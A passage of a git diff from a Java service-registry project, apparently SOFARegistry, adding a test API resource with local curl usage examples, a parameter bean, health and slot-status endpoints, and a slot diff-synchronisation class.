' -H "Content-Type: application/json" -X POST + * http://localhost:9622/datum/api/pub/add "publisherConnectId" can be unspecified. If not + * specified, the connectId of the first pub under the datum can be automatically selected (for + * testing purposes, it is generally not necessary to specify the connectId artificially). + */ + @POST + @Path("/pub/add") + @Produces(MediaType.APPLICATION_JSON) + public CommonResponse addPub(DatumParam datumParam) { + try { + checkTestApiEnable(); + validateAndCorrect(datumParam); + + // build pub + Datum datum = datumCache.get(datumParam.getDataCenter(), datumParam.getDataInfoId()); + if (datum == null) { + return getNotFoundResponse(datumParam); + } + Publisher publisher = buildPublisher(datum, datumParam); + + // build request and invoke + final int slotId = slotManager.slotOf(publisher.getDataInfoId()); + final Slot slot = slotManager.getSlot(slotId); + BatchRequest batchRequest = + new BatchRequest( + publisher.getSessionProcessId(), slotId, Collections.singletonList(publisher)); + batchRequest.setSlotTableEpoch(slotManager.getSlotTableEpoch()); + batchRequest.setSlotLeaderEpoch(slot.getLeaderEpoch()); + batchPutDataHandler.doHandle(null, batchRequest); + // get the newly datum + datum = datumCache.get(datumParam.getDataCenter(), datumParam.getDataInfoId()); + return createResponse(datum); + } catch (RuntimeException e) { + LOGGER.error(e.getMessage(), e); + return CommonResponse.buildFailedResponse(e.getMessage()); + } + } + + /** + * curl -i -d '{"dataInfoId":"testDataId#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP", + * "publisherRegisterId":"98de0e41-2a4d-44d7-b1f7-c520660657e8"} ' -H "Content-Type: + * application/json" -X POST http://localhost:9622/datum/api/pub/delete + */ + @POST + @Path("/pub/delete") + @Produces(MediaType.APPLICATION_JSON) + public CommonResponse deletePub(DatumParam datumParam) { + try { + checkTestApiEnable(); + validateAndCorrect(datumParam); + + // build pub + Datum datum = datumCache.get(datumParam.getDataCenter(), datumParam.getDataInfoId()); + if (datum == null) { + return getNotFoundResponse(datumParam); + } + UnPublisher publisher = buildUnPublisher(datum, datumParam); + + // build request and invoke + final int slotId = slotManager.slotOf(publisher.getDataInfoId()); + final Slot slot = slotManager.getSlot(slotId); + BatchRequest batchRequest = + new BatchRequest( + publisher.getSessionProcessId(), slotId, Collections.singletonList(publisher)); + batchRequest.setSlotTableEpoch(slotManager.getSlotTableEpoch()); + batchRequest.setSlotLeaderEpoch(slot.getLeaderEpoch()); + batchPutDataHandler.doHandle(null, batchRequest); + // get the newly datum + datum = datumCache.get(datumParam.getDataCenter(), datumParam.getDataInfoId()); + return createResponse(datum); + } catch (RuntimeException e) { + LOGGER.error(e.getMessage(), e); + return CommonResponse.buildFailedResponse(e.getMessage()); + } + } + + /** + * curl -d '{"dataCenter":"registry-cloud-test-b"}' -H "Content-Type: application/json" + * http://localhost:9622/datum/api/getDatumVersions + */ + @POST + @Path("/getDatumVersions") + @Produces(MediaType.APPLICATION_JSON) + public Object getDatumVersions(DatumParam datumParam) { + Map datumVersions = _getDatumVersions(datumParam); + + return datumVersions; + } + + private Map _getDatumVersions(DatumParam datumParam) { + Map datumVersions = new HashMap<>(); + if (dataServerConfig.isLocalDataCenter(datumParam.getDataCenter())) { + Map localDatums = localDatumStorage.getAll(); + return DatumUtils.getVersions(localDatums); + } else { + // TODO need support remote datecenter + LOGGER.error("unsupport remote datacenter, {}", datumParam.getDataCenter()); + } + return datumVersions; + } + + /** + * curl -d '{"dataCenter":"registry-cloud-test-b"}' -H "Content-Type: application/json" + * http://localhost:9622/datum/api/getDatumVersions + */ + @POST + @Path("/getRemoteDatumVersions") + @Produces(MediaType.APPLICATION_JSON) + public Object getRemoteDatumVersions(DatumParam datumParam) { + throw new UnsupportedOperationException(); + } + + /** curl -H "Content-Type: application/json" http://localhost:9622/datum/api/getDatumSizes */ + @GET + @Path("/getDatumSizes") + @Produces(MediaType.APPLICATION_JSON) + public Object getDatumSizes() { + Map datumSizes = new HashMap<>(); + + Map localDatums = localDatumStorage.getAll(); + int localDatumSize = localDatums.size(); + datumSizes.put(dataServerConfig.getLocalDataCenter(), localDatumSize); + // TODO remote cluster + return datumSizes; + } + + /** + * curl -d '{"dataCenter":"registry-cloud-test-b", + * "dataInfoId":"testDataId#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP"}' -H "Content-Type: + * application/json" http://localhost:9622/datum/api/getDatumVersion + */ + @POST + @Path("/getDatumVersion") + @Produces(MediaType.APPLICATION_JSON) + public Object getDatumVersion(DatumParam datumParam) { + String format = "dataCenter:%s, dataInfoId:%s, dataServer:%s, version:%s"; + String dataServer = null; + Long version = null; + if (dataServerConfig.isLocalDataCenter(datumParam.getDataCenter())) { + Map localDatums = localDatumStorage.getAll(); + Datum datum = localDatums.get(datumParam.getDataInfoId()); + if (datum != null) { + version = datum.getVersion(); + } + } else { + // TODO unsupport remote cluster + version = null; + } + + return String.format( + format, datumParam.getDataCenter(), datumParam.getDataInfoId(), dataServer, version); + } + + private CommonResponse getNotFoundResponse(DatumParam datumParam) { + return CommonResponse.buildFailedResponse( + String.format( + "datum not found by dataCenter=%s, dataInfoId=%s", + datumParam.getDataCenter(), datumParam.getDataInfoId())); + } + + private void validateAndCorrect(DatumParam datumParam) { + Validate.notNull(datumParam, "datumParam is null"); + Validate.notEmpty(datumParam.getDataInfoId(), "datumParam.dataInfoId is empty"); + if (StringUtils.isBlank(datumParam.getDataCenter())) { + datumParam.setDataCenter(dataServerConfig.getLocalDataCenter()); + } + } + + Publisher buildPublisher(Datum datum, DatumParam datumParam) { + Validate.notNull(datumParam.getPublisherRegisterId(), "datumParam.publisherRegisterId is null"); + Validate.notNull(datumParam.getPublisherCell(), "datumParam.publisherCell is null"); + Validate.notNull(datumParam.getPublisherDataBox(), "datumParam.publisherDataBox is null"); + + Publisher publisher = new Publisher(); + publisher.setSessionProcessId(TEMP_SESSION_PROCESSID); + publisher.setDataInfoId(datumParam.getDataInfoId()); + publisher.setRegisterId(datumParam.getPublisherRegisterId()); + publisher.setRegisterTimestamp(datumParam.getPublisherRegisterTimestamp()); + publisher.setVersion(datumParam.getPublisherVersion()); + if (datumParam.getPublisherConnectId() != null) { + String[] parts = datumParam.getPublisherConnectId().split(ValueConstants.CONNECT_ID_SPLIT); + if (parts.length < 2) { + throw new IllegalArgumentException( + "datumParam.publisherConnectId format invalid, should be clientIp:clientPort_sessionIp:sessionPort"); + } + publisher.setSourceAddress(URL.valueOf(parts[0])); + publisher.setTargetAddress(URL.valueOf(parts[1])); + } else { + Collection publishers = datum.getPubMap().values(); + if (publishers.size() == 0) { + throw new IllegalArgumentException( + "datumParam.publisherConnectId is null, and datum has no pubs"); + } + Publisher firstPub = publishers.iterator().next(); + publisher.setSourceAddress(firstPub.getSourceAddress()); + publisher.setTargetAddress(firstPub.getTargetAddress()); + } + publisher.setCell(datumParam.getPublisherCell()); + ServerDataBox dataBox = new ServerDataBox(datumParam.getPublisherDataBox()); + List dataList = Lists.newArrayList(dataBox); + publisher.setDataList(dataList); + return publisher; + } + + private UnPublisher buildUnPublisher(Datum datum, DatumParam datumParam) { + Validate.notNull(datumParam.getPublisherRegisterId(), "datumParam.publisherRegisterId is null"); + + UnPublisher publisher = + new UnPublisher( + datumParam.getDataInfoId(), + TEMP_SESSION_PROCESSID, + datumParam.getPublisherRegisterId(), + datumParam.getPublisherRegisterTimestamp(), + datumParam.getPublisherVersion()); + + Publisher _publisher = datum.getPubMap().get(datumParam.getPublisherRegisterId()); + if (_publisher == null) { + throw new IllegalArgumentException( + String.format("No pub of registerId(%s)", datumParam.getPublisherRegisterId())); + } + publisher.setSourceAddress(_publisher.getSourceAddress()); + publisher.setTargetAddress(_publisher.getTargetAddress()); + + return publisher; + } + + private void checkTestApiEnable() { + Validate.isTrue(dataServerConfig.isEnableTestApi(), "This api is disabled"); + } + + private CommonResponse createResponse(Datum datum) { + return CommonResponse.buildSuccessResponse( + String.format("datum=%s, publishers=%s", datum, datum.getPubMap())); + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/DatumParam.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/DatumParam.java new file mode 100644 index 000000000..0f5c13b9a --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/DatumParam.java @@ -0,0 +1,189 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.resource; + +import java.io.Serializable; +import java.util.UUID; + +/** + * @author kezhu.wukz + * @version $Id: DatumParam.java, v 0.1 2019-06-28 15:55 kezhu.wukz Exp $ + */ +public class DatumParam implements Serializable { + + private static final long serialVersionUID = -3747877410102014868L; + + private String dataInfoId; + + private String dataCenter; + + private String publisherRegisterId = UUID.randomUUID().toString(); + + private long publisherVersion = System.currentTimeMillis(); + + private long publisherRegisterTimestamp = System.currentTimeMillis(); + + private String publisherDataBox; + + private String publisherConnectId; + + private String publisherCell; + + /** + * Getter method for property publisherCell. + * + * @return property value of publisherCell + */ + public String getPublisherCell() { + return publisherCell; + } + + /** + * Setter method for property publisherCell . + * + * @param publisherCell value to be assigned to property publisherCell + */ + public void setPublisherCell(String publisherCell) { + this.publisherCell = publisherCell; + } + + /** + * Getter method for property dataInfoId. + * + * @return property value of dataInfoId + */ + public String getDataInfoId() { + return dataInfoId; + } + + /** + * Setter method for property dataInfoId . + * + * @param dataInfoId value to be assigned to property dataInfoId + */ + public void setDataInfoId(String dataInfoId) { + this.dataInfoId = dataInfoId; + } + + /** + * Getter method for property dataCenter. + * + * @return property value of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } + + /** + * Setter method for property dataCenter . + * + * @param dataCenter value to be assigned to property dataCenter + */ + public void setDataCenter(String dataCenter) { + this.dataCenter = dataCenter; + } + + /** + * Getter method for property publisherRegisterId. + * + * @return property value of publisherRegisterId + */ + public String getPublisherRegisterId() { + return publisherRegisterId; + } + + /** + * Setter method for property publisherRegisterId . + * + * @param publisherRegisterId value to be assigned to property publisherRegisterId + */ + public void setPublisherRegisterId(String publisherRegisterId) { + this.publisherRegisterId = publisherRegisterId; + } + + /** + * Getter method for property publisherVersion. + * + * @return property value of publisherVersion + */ + public long getPublisherVersion() { + return publisherVersion; + } + + /** + * Setter method for property publisherVersion . + * + * @param publisherVersion value to be assigned to property publisherVersion + */ + public void setPublisherVersion(long publisherVersion) { + this.publisherVersion = publisherVersion; + } + + /** + * Getter method for property publisherRegisterTimestamp. + * + * @return property value of publisherRegisterTimestamp + */ + public long getPublisherRegisterTimestamp() { + return publisherRegisterTimestamp; + } + + /** + * Setter method for property publisherRegisterTimestamp . + * + * @param publisherRegisterTimestamp value to be assigned to property publisherRegisterTimestamp + */ + public void setPublisherRegisterTimestamp(long publisherRegisterTimestamp) { + this.publisherRegisterTimestamp = publisherRegisterTimestamp; + } + + /** + * Getter method for property publisherDataBox. + * + * @return property value of publisherDataBox + */ + public String getPublisherDataBox() { + return publisherDataBox; + } + + /** + * Setter method for property publisherDataBox . + * + * @param publisherDataBox value to be assigned to property publisherDataBox + */ + public void setPublisherDataBox(String publisherDataBox) { + this.publisherDataBox = publisherDataBox; + } + + /** + * Getter method for property publisherConnectId. + * + * @return property value of publisherConnectId + */ + public String getPublisherConnectId() { + return publisherConnectId; + } + + /** + * Setter method for property publisherConnectId . + * + * @param publisherConnectId value to be assigned to property publisherConnectId + */ + public void setPublisherConnectId(String publisherConnectId) { + this.publisherConnectId = publisherConnectId; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/HealthResource.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/HealthResource.java index c61a8bcf8..f62e1e42c 100644 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/HealthResource.java +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/HealthResource.java @@ -17,65 +17,77 @@ package com.alipay.sofa.registry.server.data.resource; import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.metrics.ReporterUtils; import com.alipay.sofa.registry.server.data.bootstrap.DataServerBootstrap; -import com.alipay.sofa.registry.server.data.node.DataNodeStatus; -import com.alipay.sofa.registry.server.data.util.LocalServerStatusEnum; -import org.springframework.beans.factory.annotation.Autowired; - +import com.codahale.metrics.Gauge; +import com.codahale.metrics.MetricRegistry; +import javax.annotation.PostConstruct; import javax.ws.rs.GET; import javax.ws.rs.Path; import javax.ws.rs.Produces; import javax.ws.rs.core.MediaType; +import javax.ws.rs.core.Response; +import javax.ws.rs.core.Response.ResponseBuilder; +import javax.ws.rs.core.Response.Status; +import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: HealthResource.java, v 0.1 2018-10-19 14:56 shangyu.wh Exp $ */ @Path("health") public class HealthResource { - @Autowired - private DataServerBootstrap dataServerBootstrap; + @Autowired DataServerBootstrap dataServerBootstrap; - @Autowired - private DataNodeStatus dataNodeStatus; + @PostConstruct + public void init() { + MetricRegistry metrics = new MetricRegistry(); + metrics.register("healthCheck", (Gauge) () -> getHealthCheckResult()); + ReporterUtils.startSlf4jReporter(60, metrics); + } - @GET - @Path("check") - @Produces(MediaType.APPLICATION_JSON) - public CommonResponse checkHealth() { + @GET + @Path("check") + @Produces(MediaType.APPLICATION_JSON) + public Response checkHealth() { - CommonResponse response; + ResponseBuilder builder = Response.status(Response.Status.OK); + CommonResponse response = getHealthCheckResult(); + builder.entity(response); + if (!response.isSuccess()) { + builder.status(Status.INTERNAL_SERVER_ERROR); + } - StringBuilder sb = new StringBuilder("DataServerBoot "); + return builder.build(); + } - boolean start = dataServerBootstrap.getServerForSessionStarted().get(); - boolean ret = start; - sb.append("severForSession:").append(start); + private CommonResponse getHealthCheckResult() { + CommonResponse response; - start = dataServerBootstrap.getServerForDataSyncStarted().get(); - ret = ret && start; - sb.append(", severForDataSync:").append(start); + StringBuilder sb = new StringBuilder("DataServerBoot "); - start = dataServerBootstrap.getHttpServerStarted().get(); - ret = ret && start; - sb.append(", httpServer:").append(start); + boolean start = dataServerBootstrap.getServerForSessionStarted(); + boolean ret = start; + sb.append("severForSession:").append(start); - start = dataServerBootstrap.getSchedulerStarted().get(); - ret = ret && start; - sb.append(", schedulerStarted:").append(start); + start = dataServerBootstrap.getServerForDataSyncStarted(); + ret = ret && start; + sb.append(", severForDataSync:").append(start); - start = dataNodeStatus.getStatus() == LocalServerStatusEnum.WORKING; - ret = ret && start; - sb.append(", status:").append(dataNodeStatus.getStatus()); + start = dataServerBootstrap.getHttpServerStarted(); + ret = ret && start; + sb.append(", httpServer:").append(start); - if (ret) { - response = CommonResponse.buildSuccessResponse(sb.toString()); - } else { - response = CommonResponse.buildFailedResponse(sb.toString()); - } + start = dataServerBootstrap.getSchedulerStarted(); + ret = ret && start; + sb.append(", schedulerStarted:").append(start); - return response; + if (ret) { + response = CommonResponse.buildSuccessResponse(sb.toString()); + } else { + response = CommonResponse.buildFailedResponse(sb.toString()); } -} \ No newline at end of file + return response; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/SlotTableStatusResource.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/SlotTableStatusResource.java new file mode 100644 index 000000000..60a33160e --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/resource/SlotTableStatusResource.java @@ -0,0 +1,96 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.resource; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.Tuple; +import com.alipay.sofa.registry.common.model.slot.BaseSlotStatus; +import com.alipay.sofa.registry.common.model.slot.FollowerSlotStatus; +import com.alipay.sofa.registry.common.model.slot.LeaderSlotStatus; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import java.util.List; +import javax.ws.rs.GET; +import javax.ws.rs.Path; +import javax.ws.rs.Produces; +import javax.ws.rs.core.MediaType; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author chen.zhu + *

Mar 22, 2021 + */ +@Path("openapi/v1/slot/table") +public class SlotTableStatusResource { + // TODO this should be config in serverConfig + public static final long MAX_SYNC_GAP = + Long.getLong("registry.data.replicate.max.gap.millis", 3 * 60 * 1000); + + @Autowired SlotManager slotManager; + + @GET + @Path("/sync/task/status") + @Produces(MediaType.APPLICATION_JSON) + public GenericResponse getSlotTableSyncTaskStatus() { + Tuple> tuple = slotManager.getSlotTableEpochAndStatuses(); + final long epoch = tuple.o1; + final List slotStatuses = tuple.o2; + + boolean isCurrentSlotStable = true; + for (BaseSlotStatus slotStatus : slotStatuses) { + if (slotStatus.getRole() == Slot.Role.Leader) { + if (!((LeaderSlotStatus) slotStatus).getLeaderStatus().isHealthy()) { + isCurrentSlotStable = false; + break; + } + } else { + if (System.currentTimeMillis() - ((FollowerSlotStatus) slotStatus).getLastLeaderSyncTime() + > MAX_SYNC_GAP) { + isCurrentSlotStable = false; + break; + } + } + } + return new GenericResponse<>() + .fillSucceed(new SlotTableSyncTaskStatus(epoch, isCurrentSlotStable, slotStatuses)); + } + + public static class SlotTableSyncTaskStatus { + private final long epoch; + private final boolean isCurrentSlotTableStable; + private final List slotStatuses; + + public SlotTableSyncTaskStatus( + long epoch, boolean isCurrentSlotStable, List slotStatuses) { + this.epoch = epoch; + this.isCurrentSlotTableStable = isCurrentSlotStable; + this.slotStatuses = slotStatuses; + } + + public long getEpoch() { + return epoch; + } + + public boolean isCurrentSlotTableStable() { + return isCurrentSlotTableStable; + } + + public List getSlotStatuses() { + return slotStatuses; + } + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotChangeListener.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotChangeListener.java new file mode 100644 index 000000000..f97fa67ab --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotChangeListener.java @@ -0,0 +1,29 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.slot; + +import com.alipay.sofa.registry.common.model.slot.Slot; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-10-30 10:46 yuzhi.lyz Exp $ + */ +public interface SlotChangeListener { + void onSlotAdd(int slotId, Slot.Role role); + + void onSlotRemove(int slotId, Slot.Role role); +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotDiffSyncer.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotDiffSyncer.java new file mode 100644 index 000000000..608f171b9 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/slot/SlotDiffSyncer.java @@ -0,0 +1,349 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.slot; + +import static com.alipay.sofa.registry.server.data.slot.SlotMetrics.*; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.PublisherDigestUtil; +import com.alipay.sofa.registry.common.model.RegisterVersion; +import com.alipay.sofa.registry.common.model.dataserver.DatumDigest; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.slot.*; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.exchange.RequestException; +import com.alipay.sofa.registry.remoting.exchange.message.Response; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.cache.DatumStorage; +import com.alipay.sofa.registry.server.data.change.DataChangeEventCenter; +import com.alipay.sofa.registry.server.data.lease.SessionLeaseManager; +import com.alipay.sofa.registry.server.data.remoting.DataNodeExchanger; +import com.alipay.sofa.registry.server.data.remoting.SessionNodeExchanger; +import com.alipay.sofa.registry.server.shared.remoting.ClientSideExchanger; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Maps; +import com.google.common.collect.Sets; +import java.util.*; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-20 13:56 yuzhi.lyz Exp $ + */ +public final class SlotDiffSyncer { + private static final Logger LOGGER = LoggerFactory.getLogger(SlotDiffSyncer.class); + private static final Logger DIFF_LOGGER = LoggerFactory.getLogger("SYNC-DIFF"); + private final DataServerConfig dataServerConfig; + + private final DatumStorage datumStorage; + private final DataChangeEventCenter dataChangeEventCenter; + private final SessionLeaseManager sessionLeaseManager; + + SlotDiffSyncer( + DataServerConfig dataServerConfig, + DatumStorage datumStorage, + DataChangeEventCenter dataChangeEventCenter, + SessionLeaseManager sessionLeaseManager) { + this.dataServerConfig = dataServerConfig; + this.datumStorage = datumStorage; + this.dataChangeEventCenter = dataChangeEventCenter; + this.sessionLeaseManager = sessionLeaseManager; + } + + DataSlotDiffPublisherResult processSyncPublisherResp( + int slotId, + GenericResponse resp, + String targetAddress, + Map summaryMap) { + if (resp == null || !resp.isSuccess()) { + LOGGER.error("DiffPublisherFailed, slotId={} from {}, resp={}", slotId, targetAddress, resp); + return null; + } + DataSlotDiffPublisherResult result = resp.getData(); + + // sync from session + final ProcessId sessionProcessId = result.getSessionProcessId(); + if (sessionProcessId != null) { + sessionLeaseManager.renewSession(sessionProcessId); + } + + if (result.isEmpty()) { + DIFF_LOGGER.info("DiffPublisherEmpty, slotId={} from {}", slotId, targetAddress); + return result; + } + + final Set changeDataIds = Sets.newHashSet(); + for (Map.Entry> e : result.getUpdatedPublishers().entrySet()) { + final String dataInfoId = e.getKey(); + if (datumStorage.put(dataInfoId, e.getValue()) != null) { + changeDataIds.add(dataInfoId); + } + } + // for sync publishers + for (Map.Entry> e : result.getRemovedPublishers().entrySet()) { + final String dataInfoId = e.getKey(); + final List registerIds = e.getValue(); + final DatumSummary summary = summaryMap.get(dataInfoId); + if (summary == null) { + throw new IllegalArgumentException( + "sync publisher with not exist local DatumSummary:" + dataInfoId); + } + Map versionMap = summary.getPublisherVersions(registerIds); + if (datumStorage.remove(dataInfoId, sessionProcessId, versionMap) != null) { + changeDataIds.add(dataInfoId); + } + } + if (sessionProcessId != null && !changeDataIds.isEmpty()) { + // only trigger event when sync from session + dataChangeEventCenter.onChange(changeDataIds, dataServerConfig.getLocalDataCenter()); + } + DIFF_LOGGER.info( + "DiffPublisher, slotId={} from {}, updatedP {}:{}, removedP {}:{}", + slotId, + targetAddress, + result.getUpdatedPublishers().size(), + result.getUpdatedPublishersCount(), + result.getRemovedPublishersCount(), + result.getRemovedPublishers().size()); + return result; + } + + boolean syncPublishers( + int slotId, + String targetAddress, + ClientSideExchanger exchanger, + long slotTableEpoch, + Map summaryMap, + int maxPublishers, + SyncContinues continues, + boolean syncSession) { + // need the empty dataInfoId to add updatePublisher + Map round = pickSummaries(summaryMap, maxPublishers); + // sync for the existing dataInfoIds.publisher + while (!summaryMap.isEmpty()) { + if (!continues.continues()) { + LOGGER.info("syncing publishers break, slotId={} from {}", slotId, targetAddress); + return true; + } + // maybe to many publishers, spit round + if (syncSession) { + SyncSession.observeSyncSessionPub(slotId, DatumSummary.countPublisherSize(round.values())); + } else { + SyncLeader.observeSyncLeaderPub(slotId, DatumSummary.countPublisherSize(round.values())); + } + DataSlotDiffPublisherRequest request = + new DataSlotDiffPublisherRequest(slotTableEpoch, slotId, round.values()); + + GenericResponse resp = + (GenericResponse) + exchanger.requestRaw(targetAddress, request).getResult(); + DataSlotDiffPublisherResult result = + processSyncPublisherResp(slotId, resp, targetAddress, round); + if (result == null) { + return false; + } + if (!result.isHasRemain()) { + // the sync round has finish, enter next round + round.keySet().forEach(d -> summaryMap.remove(d)); + round = pickSummaries(summaryMap, maxPublishers); + } else { + // has remain, remove the synced dataInfoIds, enter next round + Set synced = result.syncDataInfoIds(); + for (String dataInfoId : synced) { + round.remove(dataInfoId); + summaryMap.remove(dataInfoId); + } + } + } + return true; + } + + boolean sync( + int slotId, + String targetAddress, + ClientSideExchanger exchanger, + long slotTableEpoch, + String summaryTargetIp, + int maxPublishers, + SyncContinues continues) { + Map summaryMap = datumStorage.getDatumSummary(slotId, summaryTargetIp); + final boolean syncSession = summaryTargetIp != null; + if (syncSession) { + SyncSession.observeSyncSessionId(slotId, summaryMap.size()); + } else { + SyncLeader.observeSyncLeaderId(slotId, summaryMap.size()); + } + Map digestMap = PublisherDigestUtil.digest(summaryMap); + DataSlotDiffDigestRequest request = + new DataSlotDiffDigestRequest(slotTableEpoch, slotId, digestMap); + Response exchangeResp = exchanger.requestRaw(targetAddress, request); + GenericResponse resp = + (GenericResponse) exchangeResp.getResult(); + DataSlotDiffDigestResult result = + processSyncDigestResp(slotId, resp, targetAddress, summaryMap); + if (result == null) { + return false; + } + if (result.getUpdateAndAddSize() == 0) { + // no change of update and add + return true; + } + final Map newSummaryMap = getSummaryForSyncPublishers(result, summaryMap); + return syncPublishers( + slotId, + targetAddress, + exchanger, + slotTableEpoch, + newSummaryMap, + maxPublishers, + continues, + syncSession); + } + + static Map getSummaryForSyncPublishers( + DataSlotDiffDigestResult result, Map digestSummaryMap) { + final Map newSummaryMap = + Maps.newHashMapWithExpectedSize(result.getUpdateAndAddSize()); + for (String add : result.getAddedDataInfoIds()) { + newSummaryMap.put(add, new DatumSummary(add)); + } + for (String update : result.getUpdatedDataInfoIds()) { + newSummaryMap.put(update, digestSummaryMap.get(update)); + } + return newSummaryMap; + } + + DataSlotDiffDigestResult processSyncDigestResp( + int slotId, + GenericResponse resp, + String targetAddress, + Map summaryMap) { + if (resp == null || !resp.isSuccess()) { + LOGGER.error("DiffDigestFailed, slotId={} from {}, resp={}", slotId, targetAddress, resp); + return null; + } + DataSlotDiffDigestResult result = resp.getData(); + + // sync from session + final ProcessId sessionProcessId = result.getSessionProcessId(); + if (sessionProcessId != null) { + sessionLeaseManager.renewSession(sessionProcessId); + } + + if (result.isEmpty()) { + DIFF_LOGGER.info("DiffDigestEmpty, slotId={} from {}", slotId, targetAddress); + return result; + } + // do nothing with added dataInfoId, the added publishers would sync and update by + // sync.publisher + // if we create a new empty datum when absent, it's dangerous. + // if some not expect error occurs when sync publisher and no publisher write to datum, + // it maybe trigger a empty push with bigger datum.version which created by new empty + final Set changeDataIds = Sets.newHashSet(); + for (String removeDataInfoId : result.getRemovedDataInfoIds()) { + if (datumStorage.remove( + removeDataInfoId, + sessionProcessId, + summaryMap.get(removeDataInfoId).getPublisherVersions()) + != null) { + changeDataIds.add(removeDataInfoId); + } + } + + if (sessionProcessId != null && !changeDataIds.isEmpty()) { + // only trigger event when sync from session + dataChangeEventCenter.onChange(changeDataIds, dataServerConfig.getLocalDataCenter()); + } + DIFF_LOGGER.info( + "DiffDigest, slotId={} from {}, update={}, add={}, remove={}, adds={}, removes={}", + slotId, + targetAddress, + result.getUpdatedDataInfoIds().size(), + result.getAddedDataInfoIds().size(), + result.getRemovedDataInfoIds().size(), + result.getAddedDataInfoIds(), + result.getRemovedDataInfoIds()); + return result; + } + + public boolean syncSession( + int slotId, + String sessionIp, + SessionNodeExchanger exchanger, + long slotTableEpoch, + SyncContinues continues) + throws RequestException { + ParaCheckUtil.checkNotBlank(sessionIp, "sessionIp"); + return sync( + slotId, + sessionIp, + exchanger, + slotTableEpoch, + sessionIp, + dataServerConfig.getSlotSyncPublisherDigestMaxNum(), + continues); + } + + public boolean syncSlotLeader( + int slotId, + String slotLeaderIp, + DataNodeExchanger exchanger, + long slotTableEpoch, + SyncContinues continues) + throws RequestException { + ParaCheckUtil.checkNotBlank(slotLeaderIp, "slotLeaderIp"); + return sync( + slotId, + slotLeaderIp, + exchanger, + slotTableEpoch, + null, + dataServerConfig.getSlotSyncPublisherDigestMaxNum(), + continues); + } + + static Map pickSummaries(Map syncSummaries, 